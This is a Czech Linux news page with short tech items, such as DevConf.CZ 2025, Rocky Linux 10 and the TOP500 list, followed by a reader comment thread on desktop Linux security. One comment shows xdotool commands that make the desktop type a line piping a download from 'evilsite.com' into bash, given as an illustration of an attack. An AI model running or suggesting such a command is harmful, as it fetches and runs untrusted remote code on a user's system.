V Brně na FIT VUT probíhá třídenní open source komunitní konference DevConf.CZ 2025. Vstup je zdarma, nutná je ale registrace. Na programu je celá řada zajímavých přednášek, lightning talků, meetupů a workshopů. Přednášky lze sledovat i online na YouTube kanálu konference. Aktuální dění lze sledovat na Matrixu, 𝕏 nebo Mastodonu.
Vyloučení technologií, které by mohly představovat bezpečnostní riziko pro stát, má umožnit zákon o kybernetické bezpečnosti, který včera Senát schválil spolu s novelami navazujících právních předpisů. Norma, kterou nyní dostane k podpisu prezident, počítá rovněž s prověřováním dodavatelů technologií pro stát. Normy mají nabýt účinnosti od třetího měsíce po jejich vyhlášení ve Sbírce zákonů.
Open source platforma Home Assistant (Demo, GitHub, Wikipedie) pro monitorování a řízení inteligentní domácnosti byla vydána v nové verzi 2025.6.
Po Red Hat Enterprise Linuxu a AlmaLinuxu byl v nové stabilní verzi 10.0 vydán také Rocky Linux. Přehled novinek v poznámkách k vydání.
Bylo vydáno Eclipse IDE 2025-06 aneb Eclipse 4.36. Představení novinek tohoto integrovaného vývojového prostředí také na YouTube.
Americká filmová studia Walt Disney a Universal Pictures podala žalobu na provozovatele populárního generátoru obrázků pomocí umělé inteligence (AI) Midjourney. Zdůvodňují to údajným porušováním autorských práv. V žalobě podané u federálního soudu v Los Angeles označují firmu za „bezednou jámu plagiátorství“, neboť podle nich bez povolení bezostyšně kopíruje a šíří postavy z filmů jako Star Wars, Ledové království nebo Já, padouch, aniž by do nich investovala jediný cent.
Ultra Ethernet Consortium (UEC), jehož cílem je optimalizace a další vývoj Ethernetu s důrazem na rostoucí síťové požadavky AI a HPC, vydalo specifikaci Ultra Ethernet 1.0 (pdf, YouTube).
Francouzský prezident Emmanuel Macron chce zakázat přístup na sociální sítě pro děti do 15 let. Francie podle něj tento krok udělá sama do několika měsíců, i pokud se na něm neshodnou další státy Evropské unie. Reaguje tak na úterní vraždu vychovatelky, kterou ve východofrancouzském městě Nogent pobodal 14letý mladík. Jednotlivé sociální sítě podle něj mají možnost věk ověřit a vymáhat zákaz pomocí systémů na rozpoznávání tváří.
Byl aktualizován seznam 500 nejvýkonnějších superpočítačů na světě TOP500. Nejvýkonnějším superpočítačem zůstává El Capitan od HPE (Cray) s výkonem 1,742 exaFLOPS. Druhý Frontier má výkon 1,353 exaFLOPS. Třetí Aurora má výkon 1,012 exaFLOPS. Nejvýkonnější český počítač C24 klesl na 165 místo. Karolina, GPU partition klesla na 195. místo a Karolina, CPU partition na 421. místo. Další přehledy a statistiky na stránkách projektu.
Oficiálně byl vydán Android 16. Detaily na blogu a stránkách věnovaných vývojářům.
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.
Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.
OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.
Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.
Tiskni
Sdílej:
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
.bashrc
. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.